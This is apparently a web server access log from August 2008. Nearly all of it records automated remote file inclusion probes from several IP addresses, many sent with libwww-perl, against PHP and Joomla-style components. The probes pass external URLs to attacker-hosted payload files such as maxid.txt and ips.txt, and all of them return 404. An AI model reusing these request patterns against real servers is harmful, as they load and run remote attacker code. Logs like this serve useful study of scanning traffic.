69.73.189.205 - - [10/Aug/2008:20:00:18 -0600] "GET /logs/error_log.20080406//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:00:19 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:00:19 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:00:22 -0600] "GET /logs/error_log.20080518//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
64.49.254.139 - - [10/Aug/2008:20:00:22 -0600] "GET /logs/error_log.20080504//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:00:22 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:00:22 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
69.73.189.205 - - [10/Aug/2008:20:00:24 -0600] "GET /logs/error_log.20080518//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:00:28 -0600] "GET /logs/error_log.20080406//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:00:28 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:00:28 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
64.49.254.139 - - [10/Aug/2008:20:00:30 -0600] "GET /logs/error_log.20080518//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:00:39 -0600] "GET /logs/error_log.20080504//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:00:39 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:00:39 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
195.5.163.212 - - [10/Aug/2008:20:00:49 -0600] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
195.5.163.212 - - [10/Aug/2008:20:00:50 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/3.0 (OS/2; U)"
195.5.163.212 - - [10/Aug/2008:20:00:50 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
194.79.75.195 - - [10/Aug/2008:20:00:51 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 238 "-" "Advanced Browser (http://www.avantbrowser.com)"
194.79.75.195 - - [10/Aug/2008:20:00:51 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
64.49.254.139 - - [10/Aug/2008:20:00:54 -0600] "GET /logs/access_log.20080706/rgboard/include/bbs.lib.inc.php?site_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:00:54 -0600] "GET /rgboard/include/bbs.lib.inc.php?site_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:00:54 -0600] "GET /logs/rgboard/include/bbs.lib.inc.php?site_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:00:57 -0600] "GET /logs/error_log.20080518//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
210.245.226.25 - - [10/Aug/2008:20:01:11 -0600] "GET /logs/error_log.20080406//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.803"
210.245.226.25 - - [10/Aug/2008:20:01:12 -0600] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
210.245.226.25 - - [10/Aug/2008:20:01:12 -0600] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
64.49.254.139 - - [10/Aug/2008:20:01:15 -0600] "GET /logs/error_log.20080406//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:01:15 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:01:15 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:01:23 -0600] "GET /logs/access_log.20080629/rgboard/include/bbs.lib.inc.php?site_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:01:28 -0600] "GET /logs/error_log.20080406//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:01:28 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:01:28 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:01:33 -0600] "GET /logs/access_log.20080406//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
70.85.102.100 - - [10/Aug/2008:20:01:35 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
70.85.102.100 - - [10/Aug/2008:20:01:36 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
70.85.102.100 - - [10/Aug/2008:20:01:36 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
70.85.102.100 - - [10/Aug/2008:20:01:36 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
195.39.5.203 - - [10/Aug/2008:20:01:42 -0600] "GET /logs/access_log.20080420//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.39.5.203 - - [10/Aug/2008:20:01:46 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 228 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.72.153.58 - - [10/Aug/2008:20:01:56 -0600] "GET /logs//components/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.72.153.58 - - [10/Aug/2008:20:01:56 -0600] "GET //components/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
219.117.239.114 - - [10/Aug/2008:20:02:13 -0600] "GET /logs/error_log/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
219.117.239.114 - - [10/Aug/2008:20:02:14 -0600] "GET /logs/error_log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
213.149.247.12 - - [10/Aug/2008:20:02:31 -0600] "GET /logs/error_log.20080629//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
213.149.247.12 - - [10/Aug/2008:20:02:32 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
213.149.247.12 - - [10/Aug/2008:20:02:32 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
213.149.247.12 - - [10/Aug/2008:20:02:53 -0600] "GET /logs/error_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
195.39.5.203 - - [10/Aug/2008:20:03:09 -0600] "GET /logs/access_log.20080420//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Aug/2008:20:03:10 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Aug/2008:20:03:10 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Aug/2008:20:03:46 -0600] "GET /logs/access_log.20080420//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Aug/2008:20:03:46 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Aug/2008:20:03:46 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
195.5.163.212 - - [10/Aug/2008:20:03:53 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Aug/2008:20:04:41 -0600] "GET /logs/access_log.20080406//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
74.6.22.151 - - [10/Aug/2008:20:05:05 -0600] "GET /logs/access_log.20080622 HTTP/1.0" 200 9393953 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.49.254.139 - - [10/Aug/2008:20:05:41 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:05:41 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:05:41 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
69.73.189.205 - - [10/Aug/2008:20:05:43 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:05:43 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:05:43 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:05:54 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:05:54 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:05:55 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
64.49.254.139 - - [10/Aug/2008:20:06:11 -0600] "GET /logs/access_log.20080615//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:06:11 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:06:11 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
195.39.5.203 - - [10/Aug/2008:20:06:29 -0600] "GET /logs/access_log.20080406//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.49.254.139 - - [10/Aug/2008:20:06:34 -0600] "GET /logs/error_log.20080511//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:06:35 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:06:35 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:06:36 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
195.39.5.203 - - [10/Aug/2008:20:06:40 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
64.49.254.139 - - [10/Aug/2008:20:07:19 -0600] "GET /logs/error_log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:07:19 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:07:19 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
69.73.189.205 - - [10/Aug/2008:20:07:27 -0600] "GET /logs/error_log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:07:27 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:07:27 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:07:32 -0600] "GET /logs/error_log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:07:32 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:07:32 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Aug/2008:20:07:34 -0600] "GET /logs/access_log.20080406//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:07:35 -0600] "GET /logs/error_log.20080420//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:07:46 -0600] "GET /logs/error_log.20080420//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
64.49.254.139 - - [10/Aug/2008:20:08:09 -0600] "GET /logs/error_log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:08:30 -0600] "GET /logs/error_log.20080420//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:08:36 -0600] "GET /logs/error_log.20080420//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
89.111.172.23 - - [10/Aug/2008:20:09:24 -0600] "GET /logs/error_log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:09:29 -0600] "GET /logs/error_log.20080420//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
202.84.119.204 - - [10/Aug/2008:20:09:48 -0600] "GET /logs/access_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
202.84.119.204 - - [10/Aug/2008:20:09:48 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
202.84.119.204 - - [10/Aug/2008:20:09:50 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:09:53 -0600] "GET /logs/error_log.20080420//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:09:53 -0600] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:09:53 -0600] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
69.73.189.205 - - [10/Aug/2008:20:09:53 -0600] "GET /logs/error_log.20080420//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
64.49.254.139 - - [10/Aug/2008:20:10:21 -0600] "GET /logs/access_log.20080420//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
202.70.83.4 - - [10/Aug/2008:20:10:40 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
202.70.83.4 - - [10/Aug/2008:20:10:41 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
64.49.254.139 - - [10/Aug/2008:20:10:42 -0600] "GET /logs/error_log.20080420//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:10:43 -0600] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:10:43 -0600] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:11:11 -0600] "GET /logs/access_log.20080420//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
83.65.7.74 - - [10/Aug/2008:20:11:19 -0600] "GET /index.php?DOCUMENT_ROOT=http://aprt.ru/lang/inc? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
72.9.159.178 - - [10/Aug/2008:20:11:24 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
72.9.159.178 - - [10/Aug/2008:20:11:24 -0600] "GET /logs/error_log.20080406//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
72.9.159.178 - - [10/Aug/2008:20:11:24 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
64.49.254.139 - - [10/Aug/2008:20:11:29 -0600] "GET /logs/access_log.20080706/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:11:29 -0600] "GET /index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:20:11:29 -0600] "GET /logs/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
193.253.223.90 - - [10/Aug/2008:20:11:37 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
193.253.223.90 - - [10/Aug/2008:20:11:37 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
